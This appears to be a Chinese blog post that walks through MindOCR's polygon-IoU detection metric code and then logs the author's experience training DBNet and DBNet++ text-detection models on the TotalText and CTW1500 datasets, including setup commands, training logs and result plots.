    min_intersect: 忽略的真实标注与预测之间的最小交集,以使预测被视为被忽略(从而在后续计算中排除)。
    """

    def __init__(self, min_iou: float = 0.5, min_intersect: float = 0.5):
    self._min_iou = min_iou
    self._min_intersect = min_intersect

    def __call__(self, gt: List[dict], preds: List[np.ndarray]) -> Tuple[List[int], List[int]]:
    """
    Converts GT and predicted polygons into binary classification labels, where 1 is positive and 0 is negative.
    将真实标注和预测多边形转换为二元分类标签,其中 1 表示正样本,0 表示负样本。

    Args:
    gt: list of ground truth dictionaries with keys: "polys" and "ignore".
    gt:包含真实标注字典的列表,每个字典中包含键 "polys" 和 "ignore"。其中,"polys" 表示真实标注的多边形信息,"ignore" 表示是否将该标注忽略。
    preds: list of predicted by a model polygons.
    preds:由模型预测的多边形列表。
    Returns:
    binary labels for the ground truth and predicted polygons.
    """
    # filter invalid groundtruth polygons and split them into useful and ignored
    gt_polys, gt_ignore = [], []
    for sample in gt:
    poly = Polygon(sample["polys"])
    if poly.is_valid and poly.is_simple:
    if not sample["ignore"]:
    gt_polys.append(poly)
    else:
    gt_ignore.append(poly)

    # repeat the same step for the predicted polygons
    det_polys, det_ignore = [], []
    for pred in preds:
    poly = Polygon(pred)
    if poly.is_valid and poly.is_simple:
    poly_area = poly.area
    if gt_ignore and poly_area > 0:
    for ignore_poly in gt_ignore:
    intersect_area = _get_intersect(ignore_poly, poly)
    precision = intersect_area / poly_area
    # If precision enough, append as ignored detection
    if precision > self._min_intersect:
    det_ignore.append(poly)
    break
    else:
    det_polys.append(poly)
    else:
    det_polys.append(poly)

    det_labels = [0] * len(gt_polys)
    if det_polys:
    iou_mat = np.zeros([len(gt_polys), len(det_polys)])
    det_rect_mat = np.zeros(len(det_polys), np.int8)

    for det_idx in range(len(det_polys)):
    if det_rect_mat[det_idx] == 0: # the match is not found yet
    for gt_idx in range(len(gt_polys)):
    iou_mat[gt_idx, det_idx] = _get_iou(det_polys[det_idx], gt_polys[gt_idx])
    if iou_mat[gt_idx, det_idx] > self._min_iou:
    # Mark the visit arrays
    det_rect_mat[det_idx] = 1
    det_labels[gt_idx] = 1
    break
    else:
    det_labels.append(1)

    gt_labels = [1] * len(gt_polys) + [0] * (len(det_labels) - len(gt_polys))
    return gt_labels, det_labels

    这段代码定义了一个名为 DetectionIoUEvaluator 的类,用于将真实的多边形位置和预测的多边形位置转换为二元分类标签,以便进行度量计算,如召回率、精确率等。

    该类有两个参数:

    • min_iou:真实值和预测值之间的最小交并比(Intersection over Union,IoU),用于被视为正确预测的阈值。
    • min_intersect:与被忽略的真实值的最小交集,用于被视为忽略的预测(从而在进一步计算中排除)的阈值。

    类的构造函数 __init__ 接受这两个参数,并将它们保存为类的属性。

    类还实现了 __call__ 方法,接受两个参数 gtpreds,分别表示真实的多边形和预测的多边形。

    该方法首先过滤掉无效的真实多边形,并将它们分为有效多边形和被忽略的多边形。然后对预测多边形进行相同的处理。

    接下来,对每个预测多边形,如果存在被忽略的真实多边形,并且预测多边形的面积大于 0,则计算它与每个被忽略的真实多边形的交集面积,并计算交集面积占预测多边形面积的比例(即 precision)。如果 precision 大于设定的阈值 min_intersect,则将该预测多边形视为被忽略的预测;否则将其视为有效预测。

    然后,将每个有效预测多边形与真实多边形计算交并比(IoU),如果交并比大于设定的阈值 min_iou,则将该真实多边形标记为正样本。

    最后,根据标记结果生成二元分类标签,其中 1 表示正样本,0 表示负样本。返回真实多边形的标签和预测多边形的标签。

    该类可能用于目标检测任务中,用于根据交并比将模型的预测结果与真实标注进行匹配,并计算度量指标(如召回率、精确率)以评估模型性能。

    class DetMetric(nn.Metric):
    """
    Calculate Recall, Precision, and F-score for predicted polygons given ground truth.
    给定真实标注,计算预测多边形的召回率、精确率和 F1 分数。

    Args:
    device_num: number of devices used in the metric calculation.
    """

    def __init__(self, device_num: int = 1, **kwargs):
    super().__init__()
    self._evaluator = DetectionIoUEvaluator()
    self._gt_labels, self._det_labels = [], []
    self.device_num = device_num
    self.all_reduce = None if device_num == 1 else ops.AllReduce()
    self.metric_names = ["recall", "precision", "f-score"]

    def clear(self):
    self._gt_labels, self._det_labels = [], []

    def update(self, *inputs):
    """
    Compute the metrics on a single batch of data.

    Args:
    inputs (tuple): contain two elements preds, gt
    preds (dict): text detection prediction as a dictionary with keys:
    polys: np.ndarray of shape (N, K, 4, 2)
    score: np.ndarray of shape (N, K), confidence score
    gts (tuple): ground truth
    - (polygons, ignore_tags), where polygons are in shape [num_images, num_boxes, 4, 2],
    ignore_tags are in shape [num_images, num_boxes], which can be defined by output_columns in yaml
    """
    preds, gts = inputs
    preds = preds["polys"]
    polys, ignore = gts[0].asnumpy().astype(np.float32), gts[1].asnumpy()

    for sample_id in range(len(polys)):
    gt = [{"polys": poly, "ignore": ig} for poly, ig in zip(polys[sample_id], ignore[sample_id])]
    gt_label, det_label = self._evaluator(gt, preds[sample_id])
    self._gt_labels.append(gt_label)
    self._det_labels.append(det_label)

    @ms_function
    def all_reduce_fun(self, x):
    res = self.all_reduce(x)
    return res

    def cal_matrix(self, det_lst, gt_lst):
    tp = np.sum((gt_lst == 1) * (det_lst == 1))
    fn = np.sum((gt_lst == 1) * (det_lst == 0))
    fp = np.sum((gt_lst == 0) * (det_lst == 1))
    return tp, fp, fn

    def eval(self) -> dict:
    """
    Evaluate by aggregating results from all batches.

    Returns:
    average recall, precision, f1-score of all samples.
    """
    # flatten predictions and labels into 1D-array
    self._det_labels = np.array([lbl for label in self._det_labels for lbl in label])
    self._gt_labels = np.array([lbl for label in self._gt_labels for lbl in label])

    tp, fp, fn = self.cal_matrix(self._det_labels, self._gt_labels)
    if self.all_reduce:
    tp = float(self.all_reduce_fun(Tensor(tp, ms.float32)).asnumpy())
    fp = float(self.all_reduce_fun(Tensor(fp, ms.float32)).asnumpy())
    fn = float(self.all_reduce_fun(Tensor(fn, ms.float32)).asnumpy())

    recall = _safe_divide(tp, (tp + fn))
    precision = _safe_divide(tp, (tp + fp))
    f_score = _safe_divide(2 * recall * precision, (recall + precision))
    return {"recall": recall, "precision": precision, "f-score": f_score}

    这段代码定义了一个名为 DetMetric 的类,用于计算预测的多边形与真实标注之间的召回率、精确率和 F1 分数。

    该类继承自 nn.Metric,并具有以下几个方法和属性:

    • __init__(self, device_num: int = 1, **kwargs):类的构造函数,接受一个整数参数 device_num,表示用于计算度量的设备数量。初始化了一个 DetectionIoUEvaluator 对象作为度量计算的评估器,并初始化了一些其他属性。
    • clear(self):清空保存的真实标签和预测标签。
    • update(self, *inputs):在单个数据批次上计算度量。接受两个输入参数,predsgtspreds 是一个字典,包含键为 “polys” 和 “score” 的两个项,分别表示预测的多边形和置信度得分。gts 是一个元组,其中包含真实标注的多边形和忽略标签。对每个样本,将真实标注和预测的多边形传递给 DetectionIoUEvaluator 对象进行评估,并保存得到的标签。
    • all_reduce_fun(self, x):用于分布式计算中的全局归约操作的函数。
    • cal_matrix(self, det_lst, gt_lst):计算真阳性(True Positive),假阳性(False Positive)和假阴性(False Negative)的数量。
    • eval(self) -> dict:在所有批次上评估度量,并返回平均召回率、精确率和 F1 分数。

    其中,_safe_divide 函数用于安全地进行除法运算,避免除以零的情况。

    该类可能用于目标检测任务中,通过对比预测的多边形和真实标注的多边形,计算模型的召回率、精确率和 F1 分数,以评估模型性能。

    def _safe_divide(numerator, denominator, val_if_zero_divide=0.0):
    if denominator == 0:
    return val_if_zero_divide
    else:
    return numerator / denominator

    _safe_divide 是一个辅助函数,用于进行除法运算并安全处理分母为零的情况。它接受三个参数:numerator(分子)、denominator(分母)和 val_if_zero_divide(当分母为零时的返回值,默认为 0.0)。

    函数的逻辑如下:

    • 如果分母 denominator 等于零,则返回 val_if_zero_divide
    • 否则,返回 numerator / denominator

    该函数的作用是避免在除法运算中出现分母为零的错误,当分母为零时,可以选择返回一个指定的默认值,以免影响后续计算。

    BlenderText

    ]]>
    + 资源

    开跑

    获取代码

    ​ 电脑下从 mindocr: MindOCR is an open-source toolbox for OCR development and application based on MindSpore. It helps users to train and apply the best text detection and recognition models, such as DBNet/DBNet++ and CR (gitee.com) 下载得到 mindocr-main.zip,拷贝到服务器的 work/ 下。

    ​ 解压。

    1
    unzip mindocr-main.zip

    ​ 将会解压得到 mindocr-main 文件夹,将其改名为 mindocr

    创建环境

    ​ 从智算中心里整一个 mindspore:2.0.2-alpha 的镜像,打开它。

    ​ 创建虚拟环境:

    1
    2
    3
    source activate base
    conda create -n mindocr --clone base
    conda activate mindocr

    ​ 检查 MindSpore 是否可用:

    1
    python -c "import mindspore;mindspore.run_check()"
    1
    2
    MindSpore version:  2.0.0a0
    The result of multiplication calculation is correct, MindSpore has been installed successfully!

    安装环境

    ​ 由于 lanms 安装方式有点坑,先装好:

    1
    pip install lanms-neo

    ​ 在 requirements.txt 里把 lanms 这行删了。

    work/ 目录下:

    1
    2
    cd mindocr
    pip install -e .
    1
    2
    3
    Successfully built mindocr
    Installing collected packages: pyclipper, lmdb, xml-python, shapely, rapidfuzz, opencv-python-headless, mindocr
    Successfully installed lmdb-1.4.1mindocr-0.2.0 opencv-python-headless-4.8.0.74 pyclipper-1.3.0.post4 rapidfuzz-3.1.1shapely-2.0.1 xml-python-0.4.3

    转换数据集

    TotalText

    ​ Windows 下,分别从 图像 (size = 441Mb) 和 标注文件 (.txt 格式) 下载 totaltext.ziptxt_format.zip

    ​ 解压这两个压缩包,将里面的文件组织成如下形式:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    totaltext
    ├── Images
    │ ├── Train
    │ │ ├── img11.jpg
    │ │ ├── img12.jpg
    │ │ ├── ...(1255 个文件)
    │ ├── Test
    │ │ ├── img1.jpg
    │ │ ├── img2.jpg
    │ │ ├── ...(300 个文件)
    ├── Txts
    │ ├── Train
    │ │ ├── poly_gt_img11.txt
    │ │ ├── poly_gt_img12.txt
    │ │ ├── ...(1255 个文件)
    │ ├── Test
    │ │ ├── poly_gt_img1.txt
    │ │ ├── poly_gt_img2.txt
    │ │ ├── ...(300 个文件)

    ​ 然后再打成压缩包 totaltext.zip,上传到服务器,解压至(unzip 命令)相应目录data/ocr_datasets/下:

    png

    ​ 返回 mindocr/ 目录,开始转换数据集:

    • Train
    1
    2
    3
    4
    5
    6
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Train/ \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Train/ \
    --output_path ./data/ocr_datasets/totaltext/train_det_gt.txt
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    Warning img1075.jpg: skipping invalid polygon [[221, 208]]
    Warning img1083.jpg: skipping invalid polygon [[534, 294]]
    Warning img114.jpg: skipping invalid polygon [[606, 697]]
    Warning img1304.jpg: skipping invalid polygon [[718, 303]]
    Warning img1474.jpg: skipping invalid polygon [[413, 792]]
    Warning img1489.jpg: skipping invalid polygon [[472, 1035]]
    Warning img700.jpg: skipping invalid polygon [[802, 1175]]
    Warning img759.jpg: skipping invalid polygon [[5, 984]]
    Warning img839.jpg: skipping invalid polygon [[491, 1052]]
    Warning img949.jpg: skipping invalid polygon [[947, 324]]
    Conversion complete.
    Result saved in ./data/ocr_datasets/totaltext/train_det_gt.txt
    • Test
    1
    2
    3
    4
    5
    6
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/totaltext/Images/Test \
    --label_dir ./data/ocr_datasets/totaltext/Txts/Test \
    --output_path ./data/ocr_datasets/totaltext/test_det_gt.txt
    1
    2
    3
    Warning img664.jpg: skipping invalid polygon [[5, 340]]
    Conversion complete.
    Result saved in ./data/ocr_datasets/totaltext/test_det_gt.txt

    ​ 这样就可得到预期格式的数据集:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    totaltext
    ├── Images
    │ ├── Train
    │ │ ├── img1001.jpg
    │ │ ├── img1002.jpg
    │ │ ├── ...
    │ ├── Test
    │ │ ├── img1.jpg
    │ │ ├── img2.jpg
    │ │ ├── ...
    ├── test_det_gt.txt
    ├── train_det_gt.txt

    CTW1500

    ​ 从 Yuliang-Liu/Curve-Text-Detector: This repository provides train&test code, dataset, det.&rec. annotation, evaluation script, annotation tool, and ranking. (github.com) 下载压缩包并解压成如下形式:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    ctw1500
    ├── ctw1500_train_labels
    │ ├── 0001.xml
    │ ├── 0002.xml
    │ ├── ...
    ├── gt_ctw_1500
    │ ├── 0001001.txt
    │ ├── 0001002.txt
    │ ├── ...
    ├── test_images
    │ ├── 1001.jpg
    │ ├── 1002.jpg
    │ ├── ...
    ├── train_images
    │ ├── 0001.jpg
    │ ├── 0002.jpg
    │ ├── ...

    ​ 将文件夹 ctw1500 重新打包成 ctw1500.zip,放到服务器中,解压出来:

    png

    mindocr/ 下执行转换命令:

    • Train
    1
    2
    3
    4
    5
    6
    python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/train_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/ctw1500_train_labels/ \
    --output_path ./data/ocr_datasets/ctw1500/train_det_gt.txt
    • Test
    1
    2
    3
    4
    5
    6
    python tools/dataset_converters/convert.py \
    --dataset_name ctw1500 \
    --task det \
    --image_dir ./data/ocr_datasets/ctw1500/test_images/ \
    --label_dir ./data/ocr_datasets/ctw1500/gt_ctw1500/ \
    --output_path ./data/ocr_datasets/ctw1500/test_det_gt.txt

    自己的数据集

    将自己的数据集转换成 totaltext 的格式:

    • Train
    1
    2
    3
    4
    5
    6
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Train/ \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Train/ \
    --output_path ./data/ocr_datasets/blendertext/train_det_gt.txt
    • Test
    1
    2
    3
    4
    5
    6
    python tools/dataset_converters/convert.py \
    --dataset_name totaltext \
    --task det \
    --image_dir ./data/ocr_datasets/blendertext/images/Test \
    --label_dir ./data/ocr_datasets/blendertext/Txts/Test \
    --output_path ./data/ocr_datasets/blendertext/test_det_gt.txt

    训练

    db_r18_totaltext(效果没有官网说的那么好但还是能用)(7.12-7.14)

    ​ 先修改 config configs/det/dbnet/db_r18_totaltext.yaml 里的数据集路径(我本来不想修改的,结果发现它默认是个绝对路径且不在 work 中,那必须改了)

    ​ 将 train: dataset:test: dataset: 下的 dataset_root 调整为自己的数据集路径,我这里是:

    1
    dataset_root: ./data/ocr_datasets
    单卡训练(成)

    单卡训练(请确保 yaml 文件中的 distribute 参数为 False。(emmmm 但好像 True 也不会影响。))

    1
    2
    # train dbnet on totaltext dataset
    python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    [2023-07-12 16:40:01] mindocr.train INFO - Standalone training. Device id: 0, specified by system.device_id in yaml config file or is default value 0.
    [2023-07-12 16:40:07] mindocr.data.builder INFO - Creating dataloader (training=True) for device 0. Number of data samples: 1255
    [2023-07-12 16:40:10] mindocr.data.builder INFO - Creating dataloader (training=False) for device 0. Number of data samples: 300
    [2023-07-12 16:40:13] mindocr.models.backbones.mindcv_models.utils INFO - Finish loading model checkpoint from: /home/ma-user/.mindspore/models/resnet18-1e65cd21.ckpt
    [2023-07-12 16:40:13] mindocr.models.utils.load_model INFO - Finish loading model checkoint from https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt. If no parameter fail-load warning displayed, all checkpoint params have been successfully loaded.
    [2023-07-12 16:40:13] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
    [2023-07-12 16:40:20] mindocr.train INFO -
    ========================================
    Distribute: False
    Model: det_resnet18-DBFPN-DBHead
    Total number of parameters: 12351042
    Total number of trainable parameters: 12340930
    Data root: ./data/ocr_datasets
    Optimizer: SGD
    Weight decay: 0.0001
    Batch size: 20
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 20x1x1=20
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 62
    Num epochs: 1200
    Clip gradient: False
    EMA: True
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    Start training... (The first epoch takes longer, please wait...)

    [2023-07-12 16:42:13] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.851490, epoch time: 113.039s, per step time: 1823.213ms, fps per card: 10.97 img/s

    ​ 妈了个巴子,README.md 写的不清不楚的,终于能跑了。不过这个 first epoch takes longer 真的够 longer……

    笑死大半夜实验室电脑寄了还让我学了怎么断点续训

    ​ 训练到一半 Moba 居然还崩溃了?还得整个断点续训 orz:docs/cn/tutorials/advanced_train.md · MindSpore Lab/mindocr - Gitee.com

    ​ 往 db_r18_totaltext.yaml 里的 model: 下添加:

    1
    resume: True

    png

    ​ 然后再:

    1
    python tools/train.py --config configs/det/dbnet/db_r18_totaltext.yaml

    ​ 会提示:

    1
    Resume train from epoch: 1049

    ​ 就可以继续了!

    分析训练结果

    ​ 最后结果:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    [2023-07-14 10:27:56] mindocr.utils.callbacks INFO - => Best f-score: 0.8407643312101911
    Training completed!
    [2023-07-14 10:27:56] mindocr.utils.callbacks INFO - Top K checkpoints:
    f-score checkpoint
    0.8408 ./tmp_det/e1110.ckpt
    0.8401 ./tmp_det/e1090.ckpt
    0.8397 ./tmp_det/e1086.ckpt
    0.8397 ./tmp_det/e1089.ckpt
    0.8394 ./tmp_det/e1126.ckpt
    0.8392 ./tmp_det/e1132.ckpt
    0.8392 ./tmp_det/e1149.ckpt
    0.8390 ./tmp_det/e1152.ckpt
    0.8389 ./tmp_det/e1129.ckpt
    0.8389 ./tmp_det/e1139.ckpt

    ​ 从 tmp_dbt/ 中可以看到输出的结果,炼出的丹,日志信息等。

    ​ 第 1110 个 epoch 的丹性能最好!

    EpochLossRecallPrecisionF-score
    11101.13984583.43%84.73%84.08%

    ​ emmmm 官网的最终效果为:

    模型环境配置骨干网络预训练数据集RecallPrecisionF-score训练时间吞吐量配置文件模型权重下载
    DBNetD910x1-MS2.0-GResNet-18SynthText83.66%87.65%85.61%12.9s/epoch96.9 img/syamlckpt

    ​ 写一个 python 读取 result.log 并画出图表:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import matplotlib.pyplot as plt

    data = [[], [], [], [], [], []]
    epochs = 0
    with open('result.log', 'r') as file:
    lines = file.readlines()
    epochs = len(lines) - 1
    for line in lines[1:]:
    for i in range(1, len(line.strip().split())):
    data[i-1].append(float(line.strip().split()[i]))

    fig, axs = plt.subplots(nrows=2, ncols=3)

    for i, ax in enumerate(axs.flat):
    ax.plot(range(1, epochs + 1), data[i])
    ax.set_xticks([0, epochs * 1 / 3, epochs * 2 / 3, epochs])
    ax.set_title(lines[0][:-1].split('\t')[i + 1])
    ax.set_xlabel('Epoch')
    ax.set_ylabel('')

    plt.tight_layout()

    plt.show()

    png

    ​ 可以看到

    • loss 逐渐下降
    • recall 逐渐接近于 1
    • precision 逐渐下降?这好吗(ChatGPT 说这是正常的)

    在训练深度神经网络时,precision(精确度)和 f-score(F1 分数)是衡量分类模型性能的指标。

    • 精确度(precision)是指被正确预测为正例的样本数占所有被预测为正例的样本数的比例。它衡量了模型在预测为正例时的准确性。
    • F1 分数(F1-score)则是同时考虑了召回率(recall)和精确度的指标,它是精确度和召回率的调和平均值。F1 分数越接近于 1 表示模型在保持高精确度和高召回率方面表现良好。

    当训练过程中,随着训练的进行,精确度下降但是 F1 分数逐渐趋近于 1 的情况是可能存在的,尤其是当模型更注重于增加召回率(即尽可能捕捉到更多的正例)时。这种情况通常发生在数据标签不平衡、类别不均衡或存在较高的假阳性或假阴性的情况下。

    此时,模型可能会将更多的样本预测为正例,导致假阳性增加,从而降低了精确度。然而,由于模型的预测更加倾向于正例,它也能更好地捕捉到真正的正例,并提高召回率。因此,F1 分数可能会逐渐趋近于 1,指示模型在整体上仍然具有较好的分类性能。

    需要注意的是,对于具体的问题和数据集,还需要根据具体情况进行分析和评估,以确定模型的性能是否符合预期要求。

    • f-score 逐渐接近于 1

    • 一开始 train_time 就会很慢,执行到 1049 的时候重启训练耗费了好多时间 orz

    原文中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18 (800)88.377.982.8

    查看 result.log 中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18 (800)85.083.284.0

    ​ 好家伙训练一个这玩意扣我 665 多块钱……

    分布式训练(寄)

    ​ 还得装 openmpi 4.0.3 (for distributed training/evaluation)

    ​ 下载 https://download.open-mpi.org/release/open-mpi/v4.0/openmpi-4.0.3.tar.gz 拷贝到服务器中,然后一阵操作:

    1
    2
    3
    4
    5
    gunzip -c openmpi-4.0.3.tar.gz | tar xf -
    cd openmpi-4.0.3
    ./configure --prefix=/usr/local
    <...lots of output...>
    make all install

    然后就会喜提安装失败。

    找了工作人员,还没得到解决方案……


    改天试试 RANK_TABLE_FILE 方法。

    db_r18_ctw1500(能跑但是没有跑完)(7.14)

    ​ 先修改 config configs/det/dbnet/db_r18_ctw1500.yaml 里的数据集路径:

    ​ 将 train: dataset:test: dataset: 下的 dataset_root 调整为自己的数据集路径:

    1
    dataset_root: ./data/ocr_datasets

    ​ 开跑!

    1
    python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    [2023-07-14 10:57:25] mindocr.models.utils.load_model INFO - Finish loading model checkoint fro                                                                m https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet18_synthtext-251ef3dd.ckpt.                                                                 If no parameter fail-load warning displayed, all checkpoint params have been successfully loade                                                                d.
    [2023-07-14 10:57:25] mindocr.optim.param_grouping INFO - no parameter grouping is applied.
    [2023-07-14 10:57:31] mindocr.train INFO -
    ========================================
    Distribute: False
    Model: det_resnet18-DBFPN-DBHead
    Total number of parameters: 12351042
    Total number of trainable parameters: 12340930
    Data root: ./data/ocr_datasets
    Optimizer: SGD
    Weight decay: 0.0001
    Batch size: 20
    Num devices: 1
    Gradient accumulation steps: 1
    Global batch size: 20x1x1=20
    LR: 0.007
    Scheduler: polynomial_decay
    Steps per epoch: 50
    Num epochs: 1200
    Clip gradient: False
    EMA: False
    AMP level: O0
    Loss scaler: {'type': 'dynamic', 'loss_scale': 512, 'scale_factor': 2, 'scale_window': 1000}
    Drop overflow update: False
    ========================================

    Start training... (The first epoch takes longer, please wait...)

    [WARNING] MD(9900,fffb197fa1e0,python):2023-07-14-10:58:45.969.430 [mindspore/ccsrc/minddata/da taset/engine/datasetops/data_queue_op.cc:832] DetectPerBatchTime] Bad performance attention, it takes more than 25 seconds to fetch a batch of data from dataset pipeline, which might result `GetNext` timeout problem. You may test dataset processing performance(with creating dataset it erator) and optimize it.
    [2023-07-14 10:59:43] mindocr.utils.callbacks INFO - epoch: [1/1200], loss: 2.689226, epoch tim e: 132.242 s, per step time: 2644.840 ms, fps per card: 7.56 img/s
    100%|████████████████████████████████████████████████████████| 500/500 [00:59<00:00, 8.42it/s]
    [2023-07-14 11:00:43] mindocr.utils.callbacks INFO - Performance: {'recall': 0.8184523809523809 , 'precision': 0.8520526723470179, 'f-score': 0.8349146110056926}, eval time: 59.41374802589416 5
    [2023-07-14 11:00:43] mindocr.utils.callbacks INFO - => Best f-score: 0.8349146110056926, check point saved.

    ​ 可是我想整个服务器后台执行,避免之前实验室电脑 Moba 大半夜掉线的尴尬:

    1
    nohup python tools/train.py --config configs/det/dbnet/db_r18_ctw1500.yaml > test_db_r18_ctw1500.log 2>&1 &
    • 最后一个“&”表示后台运行程序

    • “nohup” 表示程序不被挂起

    • “python”表示执行 python 代码

    • “-u”表示不启用缓存,实时输出打印信息到日志文件(如果不加 -u,则会导致日志文件不会实时刷新代码中的 print 函数的信息)

    • test.py”表示 python 的源代码文件(根据自己的文件修改)

    • “test.log”表示输出的日志文件(自己修改,名字自定)

    • “>”表示将打印信息重定向到日志文件

    • “2>&1”表示将标准错误输出转变化标准输出,可以将错误信息也输出到日志文件中(0-> stdin, 1->stdout, 2->stderr)

    ​ 最牛逼的伟哥提示道:

    不过这种方法 你想中途终止的话 你只能用 kill 杀掉进程来解决了

    不然只能等到运行结束

    ​ 那么直接重启服务器也是可以的。

    8.2 重跑!

    db++_r18_totaltext(魔改)(7.16)

    原仓库没有这个选项,试试直接给 db_r18_totaltext.yaml 里填上

    1
    2
    use_asf: True             # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF

    开跑!

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_totaltext.yaml > test_db++_r18_totaltext.log 2>&1 &

    分析下结果:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import matplotlib.pyplot as plt

    data = [[], [], [], [], [], []]
    epochs = 0
    with open('result.log', 'r') as file:
    lines = file.readlines()
    epochs = len(lines) - 1
    for line in lines[1:]:
    for i in range(1, len(line.strip().split())):
    data[i-1].append(float(line.strip().split()[i]))

    fig, axs = plt.subplots(nrows=2, ncols=3)

    for i, ax in enumerate(axs.flat):
    ax.plot(range(1, epochs + 1), data[i])
    ax.set_xticks([0, epochs * 1 / 3, epochs * 2 / 3, epochs])
    ax.set_title(lines[0][:-1].split('\t')[i + 1])
    ax.set_xlabel('Epoch')
    ax.set_ylabel('')

    plt.tight_layout()

    plt.show()

    png

    统计下前 10 epoch 下的 F-score 值:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    def get_top_10(lst):
    # 使用 enumerate() 函数同时迭代列表中的值和索引
    enumerated_lst = list(enumerate(lst))

    # 对列表中的元素按值进行排序
    sorted_lst = sorted(enumerated_lst, key=lambda x: x[1], reverse=True)

    # 获取排序后的前10个元素及其序号
    top_10 = sorted_lst[:10]

    return top_10

    # 调用函数获取最大的 10 个值及其序号
    result = get_top_10(data[3])

    # 输出结果
    for index, value in result:
    print(f"epoch: {index + 1}, F-score: {value}")
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    epoch: 205, F-score: 0.8386
    epoch: 217, F-score: 0.8376
    epoch: 216, F-score: 0.8375
    epoch: 402, F-score: 0.8372
    epoch: 224, F-score: 0.8371
    epoch: 209, F-score: 0.837
    epoch: 230, F-score: 0.8369
    epoch: 404, F-score: 0.8369
    epoch: 223, F-score: 0.8368
    epoch: 269, F-score: 0.8368

    emmmm 虽然 loss 一直在下降,但是 F-score 很早就趋于稳定了。但是最终的训练结果还不如 db_r18_totaltext?什么鬼啊!


    原文中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (800)84.381.082.6

    查看 result.log 中第 800 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (800)85.681.483.4

    原文中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (1024)86.781.383.9

    查看 result.log 中第 1024 个 epoch 时的性能:

    MethodPRF
    DB-ResNet-18++ (1024)84.981.383.0

    笑死,效果还不如第 800 个 epoch。

    db++_r18_ctw1500(8.4)

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db++_r18_ctw1500.yaml > test_db++_r18_ctw1500.log 2>&1 &

    db_r50_totaltext(7.27)

    1
    nohup python tools/train.py --config configs/det/dbnet/db_r50_totaltext.yaml > test_db_r50_totaltext.log 2>&1 &

    分析下结果:

    png

    db_r50_ctw1500(8.3)

    1
    nohup python tools/train.py --config configs/det/test_dbnet/db_r50_ctw1500.yaml > test_db_r50_ctw1500.log 2>&1 &

    db++_r50_totaltext(魔改)

    炼出了个不知道什么玩意儿(7.15-7.16)

    原仓库没有这个选项,作死根据 db++_r50_icdar15.yamldb_r50_totaltext.yaml 魔改成一个 db++_r50_totaltext.yaml,DB++ 与 DB 的区别就是

    1
    2
    use_asf: True             # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF

    这两行的区别:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    system:
    mode: 0 # 0 for graph mode, 1 for pynative mode in MindSpore
    distribute: False
    amp_level: 'O0'
    seed: 42
    log_interval: 10
    val_while_train: True
    val_start_epoch: 800
    drop_overflow_update: False

    model:
    type: det
    transform: null
    backbone:
    name: det_resnet50
    pretrained: False
    neck:
    name: DBFPN
    out_channels: 256
    bias: False
    use_asf: True # Adaptive Scale Fusion
    channel_attention: True # Use channel attention in ASF
    head:
    name: DBHead
    k: 50
    bias: False
    adaptive: True
    pretrained: https://download.mindspore.cn/toolkits/mindocr/dbnet/dbnet_resnet50_synthtext-40655acb.ckpt

    postprocess:
    name: DBPostprocess
    box_type: quad # whether to output a polygon or a box
    binary_thresh: 0.3 # binarization threshold
